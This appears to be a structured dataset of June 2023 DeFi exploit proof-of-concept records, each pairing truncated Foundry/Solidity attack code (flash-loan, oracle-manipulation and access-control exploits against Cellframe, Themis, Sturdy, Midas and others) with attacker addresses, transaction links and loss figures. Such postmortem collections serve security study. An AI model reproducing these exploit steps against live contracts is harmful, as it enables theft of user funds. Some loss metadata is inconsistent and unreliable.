// Vulnerable Proxy DEPUSDT : https://etherscan.io/address/0x7b190a928aa76eece5cb3e0f6b3bdb24fcdd9b4f
// Vulnerable Proxy LEVUS... | exploit_poc | DEPUSDT_LEVUSDC | 2023-06 | DEPUSDT_LEVUSDC_exp.sol | access_control | 88e7e01d05ef0351 | 2026-01-07T10:59:16.511861 | postmortems | ethereum | 17,484,161 | ~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT) | 36,000 | null | null | null | null | null | null | true | true | true | medium | ~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT) | access-control | function testApprove() public {
// No access control. Thanks to this, attacker obtained authorization to transfer funds
ProxyDEPUSDT.approveToken(address(DEPUSDT), address(this), type(uint256).max);
DEPUSDT.transferFrom(address(ProxyDEPUSDT), address(this), DEPUSDT.balanceOf(address(ProxyDEPUSD... | true | ~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT) | $36.0K | 6.28 | medium | DEPUSDT_LEVUSDC Exploit (2023-06) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~76K USD$
// Attacker - https://bscscan.com/address/0x2525c811ecf22fc5fcde03c67112d34e97da6079
// Attack contract - https://bscscan.com/address/0x1e2a251b29e84e1d6d762c7... | exploit_poc | Cellframe | 2023-06 | Cellframe_exp.sol | flash_loan | 2a79592180895132 | 2026-01-07T10:59:16.511906 | postmortems | bsc | 28,708,273 | ~76K USD$ | 76,000 | null | null | null | https://bscscan.com/tx/0x943c2a5f89bc0c17f3fe1520ec6215ed8c6b897ce7f22f1b207fea3f79ae09a6 | null | null | true | true | true | medium | ~76K USD$ | flash-loan | function testExploit() public {
deal(address(WBNB), address(this), 0.1 ether);
emit log_named_decimal_uint(
"Attacker WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals()
);
// Preparation. Pre-attack transaction
WBNB.approve(address(Router), t... | true | ~76K USD$ | https://bscscan.com/tx/0x943c2a5f89bc0c17f3fe1520ec6215ed8c6b897ce7f22f1b207fea3f79ae09a6 | $76.0K | 9 | high | Cellframe Exploit (2023-06) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~370K USD$
// Attacker : https://arbiscan.io/address/0xdb73eb484e7dea3785520d750eabef50a9b9ab33
// Attack Contracts : https://arbiscan.io/address/0x05a1b877330c168451f08... | exploit_poc | Themis | 2023-06 | Themis_exp.sol | flash_loan | 1bcae309a0a6be81 | 2026-01-07T10:59:16.511971 | postmortems | arbitrum | 105,524,523 | ~370K USD$ | 370,000 | https://arbiscan.io/address/0xdb73eb484e7dea3785520d750eabef50a9b9ab33 | null | https://arbiscan.io/address/0x75f805e2fb248462e7817f0230b36e9fae0280fc | https://arbiscan.io/tx/0xff368294ccb3cd6e7e263526b5c820b22dea2b2fd8617119ba5c3ab8417403d8 | null | null | true | true | true | high | ~370K USD$ | flash-loan | function testExploit() public {
WETH.approve(address(AaveV3), type(uint256).max);
address[] memory assets = new address[](1);
assets[0] = address(WETH);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 22_000 * 1e18;
uint256[] memory modes = new uint256[](1);
... | true | ~370K USD$ | https://arbiscan.io/address/0xdb73eb484e7dea3785520d750eabef50a9b9ab33 | https://arbiscan.io/address/0x75f805e2fb248462e7817f0230b36e9fae0280fc | https://arbiscan.io/tx/0xff368294ccb3cd6e7e263526b5c820b22dea2b2fd8617119ba5c3ab8417403d8 | $370.0K | 10 | high | Themis Exploit (2023-06) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~27,174K USD$
// Attacker : https://etherscan.io/address/0x0e816b0d0a66252c72af822d3e0773a2676f3278
// Attack Contract : https://etherscan.io/address/0x2d7973177d594237a... | exploit_poc | CompounderFinance | 2023-06 | CompounderFinance_exp.sol | flash_loan | 45751ee4679cefbc | 2026-01-07T10:59:16.512052 | postmortems | ethereum | 17,426,064 | ~27,174K USD$ | 27 | https://etherscan.io/address/0x0e816b0d0a66252c72af822d3e0773a2676f3278 | https://etherscan.io/address/0x2d7973177d594237a9b347cd41082af4cbb40f2b | https://etherscan.io/address/0xaf274e912243b19b882f02d731dacd7cd13072d0 | https://etherscan.io/tx/0xcff84cc137c92e427f720ca1f2b36fbad793f34ec5117eed127060686e6797b1 | null | null | true | true | true | low | ~27,174K USD$ | flash-loan | function testExploit() public {
emit log_named_decimal_uint("Attacker amount of DAI before hack", DAI.balanceOf(address(this)), DAI.decimals());
// Step 1. Flashloan 1_239 DAI through Uniswap V3 flash loans
DAIUSDCPool.flash(address(this), 1_239_990 * 1e18, 0, "");
emit log_named_decim... | true | ~27,174K USD$ | https://etherscan.io/address/0x0e816b0d0a66252c72af822d3e0773a2676f3278 | https://etherscan.io/address/0x2d7973177d594237a9b347cd41082af4cbb40f2b | https://etherscan.io/address/0xaf274e912243b19b882f02d731dacd7cd13072d0 | https://etherscan.io/tx/0xcff84cc137c92e427f720ca1f2b36fbad793f34ec5117eed127060686e6797b1 | $27 | 9.68 | high | CompounderFinance Exploit (2023-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "./../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$600K
// Attacker : https://bscscan.com/address/0x4b92cc3452ef1e37528470495b86d3f976470734
// Attack Contract : https://bscscan.com/address/0xc40119c7269a5fa813d878bf83d... | exploit_poc | MidasCapitalXYZ | 2023-06 | MidasCapitalXYZ_exp.sol | oracle_manipulation | ead75e70ac1ce3d0 | 2026-01-07T10:59:16.512124 | postmortems | bsc | null | ~$600K | 600,000 | https://bscscan.com/address/0x4b92cc3452ef1e37528470495b86d3f976470734 | https://bscscan.com/address/0xc40119c7269a5fa813d878bf83d14e3462fc8fde | https://bscscan.com/address/0xf8527dc5611b589cbb365acacaac0d1dc70b25cb | https://app.blocksec.com/explorer/tx/bsc/0x4a304ff08851106691f626045b0f55d403e3a0958363bdf82b96e8ce7209c3a6 | https://medium.com/midas-capital/midas-exploit-post-mortem-1ae266222994 | null | true | true | true | high | ~$600K | oracle-manipulation | function testExploit() public {
// Initial HAY and BUSDT amounts transferred by exploiter to this contract before attack start
deal(address(HAY), address(this), 220_000e18);
deal(address(BUSDT), address(this), 23_000e18);
emit log_named_decimal_uint(
"Exploiter ankrBNB balan... | true | ~$600K | https://bscscan.com/address/0x4b92cc3452ef1e37528470495b86d3f976470734 | https://bscscan.com/address/0xc40119c7269a5fa813d878bf83d14e3462fc8fde | https://bscscan.com/address/0xf8527dc5611b589cbb365acacaac0d1dc70b25cb | https://app.blocksec.com/explorer/tx/bsc/0x4a304ff08851106691f626045b0f55d403e3a0958363bdf82b96e8ce7209c3a6 | https://medium.com/midas-capital/midas-exploit-post-mortem-1ae266222994 | $600.0K | 10 | high | MidasCapitalXYZ Exploit (2023-06) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~6k USD$
// Attacker : https://etherscan.io/address/0x9748c8540a5f752ba747f1203ac13dae789033de
// Attack Contract : https://etherscan.io/address/0xf73b8ea8838cba9148fb18... | exploit_poc | VINU | 2023-06 | VINU_exp.sol | null | b5fd7b0688da9c82 | 2026-01-07T10:59:16.512201 | postmortems | ethereum | 17,421,006 | ~6k USD$ | 6,000 | https://etherscan.io/address/0x9748c8540a5f752ba747f1203ac13dae789033de | https://etherscan.io/address/0xf73b8ea8838cba9148fb182e267a000f7cfba8dd | null | https://etherscan.io/tx/0xaf46a42fe1ed7193b25c523723dc047c7500e50a00ecb7bbb822d665adb3e1f3 | null | null | true | true | false | low | ~6k USD$ | unknown | function testExploit() public {
emit log_named_decimal_uint("Attacker's contract ETH balance before attack", address(this).balance, 18);
emit log_named_decimal_uint(
"Attacker's contract WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals()
);
address[... | true | ~6k USD$ | https://etherscan.io/address/0x9748c8540a5f752ba747f1203ac13dae789033de | https://etherscan.io/address/0xf73b8ea8838cba9148fb182e267a000f7cfba8dd | https://etherscan.io/tx/0xaf46a42fe1ed7193b25c523723dc047c7500e50a00ecb7bbb822d665adb3e1f3 | $6.0K | 6.96 | medium | VINU Exploit (2023-06) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~17K USD$
// Attacker : https://etherscan.io/address/0x9d4fd681aacbc49d79c6405c9aa70d1afd5accf3
// Attack Contract : https://etherscan.io/address/0x26fe84754a1967d67b7be... | exploit_poc | MIMSpell | 2023-06 | MIMSpell_exp.sol | null | fbf7ad6ef9ba9c1a | 2026-01-07T10:59:16.512258 | postmortems | ethereum | 17,521,638 | ~17K USD$ | 17,000 | https://etherscan.io/address/0x9d4fd681aacbc49d79c6405c9aa70d1afd5accf3 | https://etherscan.io/address/0x26fe84754a1967d67b7befaa01b10d7b35bbaf0a | https://etherscan.io/address/0xa5564a2d1190a141cac438c9fde686ac48a18a79 | https://etherscan.io/tx/0x2c9f87e285026601a2c8903cf5f10e5b3655fbd0264490c41514ce073c42a9c3 | null | null | true | true | false | medium | ~17K USD$ | unknown | function testTransaction() public {
emit log_named_decimal_uint(
"Exploiter's amount of MIM tokens before attack", MIM.balanceOf(exploiter), MIM.decimals()
);
SUSDT.transferFrom(exploiter, address(this), 3e6);
SUSDT.approve(address(DegenBox), type(uint256).max);
Dege... | true | ~17K USD$ | https://etherscan.io/address/0x9d4fd681aacbc49d79c6405c9aa70d1afd5accf3 | https://etherscan.io/address/0x26fe84754a1967d67b7befaa01b10d7b35bbaf0a | https://etherscan.io/address/0xa5564a2d1190a141cac438c9fde686ac48a18a79 | https://etherscan.io/tx/0x2c9f87e285026601a2c8903cf5f10e5b3655fbd0264490c41514ce073c42a9c3 | $17.0K | 8.44 | high | MIMSpell Exploit (2023-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$820K
// Attacker : https://etherscan.io/address/0x8f7370d5d461559f24b83ba675b4c7e2fdb514cc
// Attacker Contract : https://etherscan.io/address/0xb618d91fe014bfcb9c8d44... | exploit_poc | Pawnfi | 2023-06 | Pawnfi_exp.sol | oracle_manipulation | c27f6e4c0e85efb5 | 2026-01-07T10:59:16.512330 | postmortems | ethereum | 17,496,619 | ~$820K | 820,000 | https://etherscan.io/address/0x8f7370d5d461559f24b83ba675b4c7e2fdb514cc | null | https://etherscan.io/address/0x85018CF6F53c8bbD03c3137E71F4FCa226cDa92C#code | https://etherscan.io/tx/0x8d3036371ccf27579d3cb3d4b4b71e99334cae8d7e8088247517ec640c7a59a5 | null | null | true | true | true | high | ~$820K | oracle-manipulation | function testExploit() public {
deal(address(this), 0);
// I add the following line of code only to make the poc work.
// Without it the output from APE.balanceOf(P-BAYC) will be 0 and the error 'ERC20: transfer amount exceeds balance' will occur
// In the attack tx APE balance of P-BAYC... | true | ~$820K | https://etherscan.io/address/0x8f7370d5d461559f24b83ba675b4c7e2fdb514cc | https://etherscan.io/address/0x85018CF6F53c8bbD03c3137E71F4FCa226cDa92C#code | https://etherscan.io/tx/0x8d3036371ccf27579d3cb3d4b4b71e99334cae8d7e8088247517ec640c7a59a5 | $820.0K | 10 | high | Pawnfi Exploit (2023-06) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~10 $BNB
// Attacker : https://bscscan.com/address/0xc47fcc9263b026033a94574ec432514c639a2d12
// Attack Contract : https://bscscan.com/address/0x0d3aafb9ade835456b2595509ac1f58922e465b3
// Vulnerable Contract : https://bscscan.c... | exploit_poc | MyAi | 2023-06 | MyAi_exp.sol | null | 48df71d91221dc38 | 2026-01-07T10:59:16.512405 | postmortems | bsc | 29,554,344 | ~10 $BNB | 10 | https://bscscan.com/address/0xc47fcc9263b026033a94574ec432514c639a2d12 | https://bscscan.com/address/0x0d3aafb9ade835456b2595509ac1f58922e465b3 | https://bscscan.com/address/0xdb103fd28ca4b18115f5ce908baaeed7e0f1f101 | https://bscscan.com/tx/0x346f65ac333eb6d69886f5614aaf569a561a53a8d93db4384bd7c0bec15ae9f6 | null | null | true | false | false | low | ~10 $BNB | unknown | function testExploit() public {
emit log_named_decimal_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)), 18);
MyAi.approve(address(PancakeRouter), type(uint256).max);
MyAi.approve(address(MultiSender), type(uint256).max);
address[] memory Attack = new address[](... | true | ~10 $BNB | https://bscscan.com/address/0xc47fcc9263b026033a94574ec432514c639a2d12 | https://bscscan.com/address/0x0d3aafb9ade835456b2595509ac1f58922e465b3 | https://bscscan.com/address/0xdb103fd28ca4b18115f5ce908baaeed7e0f1f101 | https://bscscan.com/tx/0x346f65ac333eb6d69886f5614aaf569a561a53a8d93db4384bd7c0bec15ae9f6 | $10 | 7.39 | medium | MyAi Exploit (2023-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~5955 USD
// TX : https://app.blocksec.com/explorer/tx/bsc/0xe1bf84b7a57498c0573361b20b16077cc933e4c47aa0821bcea5b158a60ef505
// Attacker : https://bscscan.com/address... | exploit_poc | UnverifiedContr_9ad32 | 2023-06 | UnverifiedContr_9ad32_exp.sol | flash_loan | 1e15caf36e5f1839 | 2026-01-07T10:59:16.512446 | postmortems | bsc | 29,469,587 | ~5955 USD | 5,955 | https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d | https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d | null | null | null | null | true | false | true | low | ~5955 USD | flash-loan | function testExploit() public {
emit log_named_decimal_uint("[End] Attacker BUSD after exploit", BUSD.balanceOf(address(this)), 18);
DPPOracle.flashLoan(0, 1_243_763_239_827_755_213_151_683, address(this), abi.encode(address(this)));
emit log_named_decimal_uint("[End] Attacker BUSD after exploi... | true | https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d | https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d | $6.0K | 5.91 | medium | UnverifiedContr_9ad32 Exploit (2023-06) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : unclear US$
// Attacker : https://bscscan.com/address/0x0060129430df7ea188be3d8818404a2d40896089
// Attack Contract : https://bscscan.com/address/0x2cc392c0207d080aec0be... | exploit_poc | SELLC03 | 2023-06 | SELLC03_exp.sol | flash_loan | ae2b72b7d2e66899 | 2026-01-07T10:59:16.512486 | postmortems | bsc | 29,005,754 | unclear US$ | null | https://bscscan.com/address/0x0060129430df7ea188be3d8818404a2d40896089 | https://bscscan.com/address/0x2cc392c0207d080aec0befe5272659d3bb8a7052 | https://bscscan.com/address/0x84Be9475051a08ee5364fBA44De7FE83a5eCC4f1 | https://bscscan.com/tx/0xe968e648b2353cea06fc3da39714fb964b9354a1ee05750a3c5cc118da23444b | null | https://twitter.com/EoceneSecurity/status/1668468933723328513 | true | true | true | medium | unclear US$ | flash-loan | function testExploit() public {
miner.setBNB{value: 0.01 ether}(address(SELLC), address(USDT));
cheats.warp(block.timestamp + 1 * 86_400 + 1);
oracle.flashLoan(600 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint(
"[End] Attacker WBNB balance after exploit... | true | unclear US$ | https://bscscan.com/address/0x0060129430df7ea188be3d8818404a2d40896089 | https://bscscan.com/address/0x2cc392c0207d080aec0befe5272659d3bb8a7052 | https://bscscan.com/address/0x84Be9475051a08ee5364fBA44De7FE83a5eCC4f1 | https://bscscan.com/tx/0xe968e648b2353cea06fc3da39714fb964b9354a1ee05750a3c5cc118da23444b | https://twitter.com/EoceneSecurity/status/1668468933723328513 | Unknown | 8.08 | high | SELLC03 Exploit (2023-06) | false | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/DecurityHQ/status/1671803688996806656
// @TX
// https://bscscan.com/tx/0x24a68d2a4bbb02f398d3601acfd87b09f543d935fc24862c314aaf64c295acdb
// @Summary
// Reelect... | exploit_poc | BUNN | 2023-06 | BUNN_exp.sol | null | f38e7c837dfcc05f | 2026-01-07T10:59:16.512534 | postmortems | bsc | 29,304,627 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 0.89 | low | BUNN Exploit (2023-06) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~72K
// Attacker - https://bscscan.com/address/0xa1e31b29f94296fc85fac8739511360f279b1976
// Attack contract - https://bscscan.com/address/0x1d448e9661c5abfc732ea81330c6... | exploit_poc | Biswap | 2023-06 | Biswap_exp.sol | null | cbfbbd6b6e239685 | 2026-01-07T10:59:16.512594 | postmortems | bsc | null | ~72K | 72,000 | null | null | null | https://bscscan.com/tx/0xebe5248820241d8de80bcf66f4f1bfaaca62962824efaaa662db84bd27f5e47e, | null | null | true | true | false | medium | ~72K | unknown | function testExploit() public {
V3Migrator migrator = V3Migrator(0x839b0AFD0a0528ea184448E890cbaAFFD99C1dbf);
IUniswapV2Pair pairToMigrate = IUniswapV2Pair(0x63b30de1A998e9E64FD58A21F68D323B9BcD8F85);
address victimAddress = 0x2978D920a1655abAA315BAd5Baf48A2d89792618;
IBiswapFactoryV3 b... | true | ~72K | https://bscscan.com/tx/0xebe5248820241d8de80bcf66f4f1bfaaca62962824efaaa662db84bd27f5e47e, | $72.0K | 8 | high | Biswap Exploit (2023-06) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~26K USD$
// Attacker - https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
// Attack contract - https://bscscan.com/address/0x98e241bd3be918e0d927af8... | exploit_poc | UN | 2023-06 | UN_exp.sol | flash_loan | fc1f328826aa702d | 2026-01-07T10:59:16.512659 | postmortems | bsc | 28,864,173 | ~26K USD$ | 26,000 | null | null | null | https://bscscan.com/tx/0xff5515268d53df41d407036f547b206e288b226989da496fda367bfeb31c5b8b | null | null | true | true | true | medium | ~26K USD$ | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Attacker BUSD balance before attack", BUSD.balanceOf(address(this)), BUSD.decimals()
);
// End of preparation. Attack start
DPPOracle.flashLoan(0, 29_100 * 1e18, address(this), new bytes(1));
emit log_nam... | true | ~26K USD$ | https://bscscan.com/tx/0xff5515268d53df41d407036f547b206e288b226989da496fda367bfeb31c5b8b | $26.0K | 7.45 | medium | UN Exploit (2023-06) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import "./../interface.sol";
// REKT - NST Simple Swap
// Write up Author
// https://twitter.com/eugenioclrc
// Reported on https://discord.com/channels/1100129537603407972/1100129538056396870/1114142216923926528
// @TX
// ht... | exploit_poc | NST | 2023-06 | NST_exp.sol | flash_loan | 8eda1bab284990fe | 2026-01-07T10:59:16.512702 | postmortems | polygon | 43,430,814 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
usdt.approve(swapper, type(uint256).max);
nst.approve(swapper, type(uint256).max);
// the attacker use balancer to take a flashloan of 40k usd, im gonna mock it
// to make it simpler to read
deal(address(usdt), address(this), 40_000_000_000); // 4... | true | Unknown | 4.53 | low | NST Exploit (2023-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~1300 $USDC
// Attacker : https://etherscan.io/address/0x015d0b51d0a65ad11cf4425de2ec86a7b320db3f
// Attack Contract : https://etherscan.io/address/0xfe2011dad32ad6dfd128e55490c0fd999f3d2221
// Vulnerable Contract : https://ethe... | exploit_poc | Contract_0x7657 | 2023-06 | Contract_0x7657_exp.sol | flash_loan | cd26e577a5b58e7f | 2026-01-07T10:59:16.512746 | postmortems | ethereum | 17,511,178 | ~1300 $USDC | 1,300 | https://etherscan.io/address/0x015d0b51d0a65ad11cf4425de2ec86a7b320db3f | https://etherscan.io/address/0xfe2011dad32ad6dfd128e55490c0fd999f3d2221 | https://etherscan.io/address/0x76577603f99eae8320f70b410a350a83d744cb77 | https://etherscan.io/tx/0x74279a131dccd6479378b3454ea189a6ce350cce51de47d81a0ef23db1b134d5 | null | null | true | false | true | low | ~1300 $USDC | flash-loan | function testExploit() public {
emit log_named_decimal_uint("Attacker USDT balance before attack", USDT.balanceOf(address(this)), 6);
uint256 Victim_balance = USDT.balanceOf(address(Victim));
(bool success, bytes memory data) =
Contract_addr.call(abi.encodeWithSelector(bytes4(0x0a8fe... | true | ~1300 $USDC | https://etherscan.io/address/0x015d0b51d0a65ad11cf4425de2ec86a7b320db3f | https://etherscan.io/address/0xfe2011dad32ad6dfd128e55490c0fd999f3d2221 | https://etherscan.io/address/0x76577603f99eae8320f70b410a350a83d744cb77 | https://etherscan.io/tx/0x74279a131dccd6479378b3454ea189a6ce350cce51de47d81a0ef23db1b134d5 | $1.3K | 8.16 | high | Contract_0x7657 Exploit (2023-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~300K USD$
// Attacker : https://bscscan.com/address/0x0a3fee894eb8fcb6f84460d5828d71be50612762
// Attack Contract : https://bscscan.com/address/0x105e9b0266ae0ae670b7fe... | exploit_poc | DDCoin | 2023-06 | DDCoin_exp.sol | flash_loan | 439ee19647366c24 | 2026-01-07T10:59:16.512788 | postmortems | bsc | 28,714,107 | ~300K USD$ | 300,000 | https://bscscan.com/address/0x0a3fee894eb8fcb6f84460d5828d71be50612762 | https://bscscan.com/address/0x105e9b0266ae0ae670b7fe9af08cf32049f0dd21 | https://bscscan.com/address/0xb3a636ac4c271e6cd962cad98eae9cf71f5a49c8 | https://bscscan.com/tx/0xd92bf51b9bf464420e1261cfcd8b291ee05d5fbffbfbb316ec95131779f80809 | null | null | true | true | true | high | ~300K USD$ | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
emit log_named_decimal_uint(
"BUSDT attacker balance before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), new ... | true | ~300K USD$ | https://bscscan.com/address/0x0a3fee894eb8fcb6f84460d5828d71be50612762 | https://bscscan.com/address/0x105e9b0266ae0ae670b7fe9af08cf32049f0dd21 | https://bscscan.com/address/0xb3a636ac4c271e6cd962cad98eae9cf71f5a49c8 | https://bscscan.com/tx/0xd92bf51b9bf464420e1261cfcd8b291ee05d5fbffbfbb316ec95131779f80809 | $300.0K | 10 | high | DDCoin Exploit (2023-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~230K US$
// Attacker : https://bscscan.com/address/0x69810917928b80636178b1bb011c746efe61770d
// Attack Contract : https://bscscan.com/address/0xcdb3d057ca0cfdf630baf3f... | exploit_poc | SHIDO | 2023-06 | SHIDO_exp.sol | flash_loan | 2b9eae9a00b56793 | 2026-01-07T10:59:16.512845 | postmortems | bsc | 29,365,171 | ~230K US$ | 230,000 | https://bscscan.com/address/0x69810917928b80636178b1bb011c746efe61770d | https://bscscan.com/address/0xcdb3d057ca0cfdf630baf3f90e9045ddeb9ea4cc | https://bscscan.com/address/0xa963ee460cf4b474c35ded8fff91c4ec011fb640 | https://bscscan.com/tx/0x72f8dd2bcfe2c9fbf0d933678170417802ac8a0d8995ff9a56bfbabe3aa712d6 | null | https://twitter.com/Phalcon_xyz/status/1672473343734480896 | true | true | true | high | ~230K US$ | flash-loan | function testExploit() public {
DVM(dodo).flashLoan(40 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint(
"Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB.decimals()
);
} | true | ~230K US$ | https://bscscan.com/address/0x69810917928b80636178b1bb011c746efe61770d | https://bscscan.com/address/0xcdb3d057ca0cfdf630baf3f90e9045ddeb9ea4cc | https://bscscan.com/address/0xa963ee460cf4b474c35ded8fff91c4ec011fb640 | https://bscscan.com/tx/0x72f8dd2bcfe2c9fbf0d933678170417802ac8a0d8995ff9a56bfbabe3aa712d6 | https://twitter.com/Phalcon_xyz/status/1672473343734480896 | $230.0K | 9.08 | high | SHIDO Exploit (2023-06) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~16k
// Attacker contract address : https://bscscan.com/address/0x8213e87bb381919b292ace364d97d3a1ee38caa4
// Vulnerable contract : https://bscscan.com/address/0xdd9b223... | exploit_poc | CFC | 2023-06 | CFC_exp.sol | flash_loan | a12bce69602e5b63 | 2026-01-07T10:59:16.512893 | postmortems | bsc | 29,116,478 | ~16k | 16,000 | null | null | https://bscscan.com/address/0xdd9b223aec6ea56567a62f21ff89585ff125632c | https://explorer.phalcon.xyz/tx/bsc/0xa3c130ed8348919f73cbefce0f22d46fa381c8def93654e391ddc95553240c1e | null | null | true | true | true | medium | ~16k | flash-loan | function testSkim() public {
deal(address(BEP20USDT), address(this), 0);
emit log_named_decimal_uint(
"Attacker BEP20USDT balance before attack", BEP20USDT.balanceOf(address(this)), BEP20USDT.decimals()
);
takeFlashloan(DPPOracle1);
emit log_named_decimal_uint(
... | true | ~16k | $16.0K | 9.77 | high | CFC Exploit (2023-06) | true | true | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~125K USD$
// Attacker : https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
// Attack Contract : https://bscscan.com/address/0x98e241bd3be918e0d927af... | exploit_poc | ARA | 2023-06 | ARA_exp.sol | flash_loan | 325dc8952f3e0fd0 | 2026-01-07T10:59:16.512947 | postmortems | bsc | 29,214,010 | ~125K USD$ | 125,000 | https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 | https://bscscan.com/address/0x98e241bd3be918e0d927af81b430be00d86b04f9 | https://bscscan.com/address/0x7ba5dd9bb357afa2231446198c75bac17cefcda9 | https://bscscan.com/tx/0xd87cdecd5320301bf9a985cc17f6944e7e7c1fbb471c80076ef2d031cc3023b2 | null | null | true | true | true | high | ~125K USD$ | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
BUSDT.approve(address(Router), type(uint256).max);
ARA.approve(address(Router), type(uint256).max);
emit log_named_decimal_uint(
"Attacker BUSDT balance before hack", BUSDT.balanceOf(address(this)), BUSD... | true | ~125K USD$ | https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 | https://bscscan.com/address/0x98e241bd3be918e0d927af81b430be00d86b04f9 | https://bscscan.com/address/0x7ba5dd9bb357afa2231446198c75bac17cefcda9 | https://bscscan.com/tx/0xd87cdecd5320301bf9a985cc17f6944e7e7c1fbb471c80076ef2d031cc3023b2 | $125.0K | 9.31 | high | ARA Exploit (2023-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~800K USD$
// Attacker : https://etherscan.io/address/0x1e8419e724d51e87f78e222d935fbbdeb631a08b
// Attack Contract : https://etherscan.io/address/0x0b09c86260c12294e3b9... | exploit_poc | Sturdy | 2023-06 | Sturdy_exp.sol | flash_loan | f14e57c68f3693f7 | 2026-01-07T10:59:16.513006 | postmortems | ethereum | 17,460,609 | ~800K USD$ | 800,000 | https://etherscan.io/address/0x1e8419e724d51e87f78e222d935fbbdeb631a08b | https://etherscan.io/address/0x0b09c86260c12294e3b967f0d523b4b2bcdfbeab | https://etherscan.io/address/0x9f72dc67cec672bb99e3d02cbea0a21536a2b657 | https://etherscan.io/tx/0xeb87ebc0a18aca7d2a9ffcabf61aa69c9e8d3c6efade9e2303f8857717fb9eb7 | https://sturdyfinance.medium.com/exploit-post-mortem-49261493307a | https://twitter.com/AnciliaInc/status/1668081008615325698 | true | true | true | high | ~800K USD$ | flash-loan | function testExploit() public {
deal(address(this), 0);
address[] memory assets = new address[](2);
assets[0] = address(wstETH);
assets[1] = address(WETH);
uint256[] memory amounts = new uint256[](2);
amounts[0] = 50_000 * 1e18;
amounts[1] = 60_000 * 1e18;
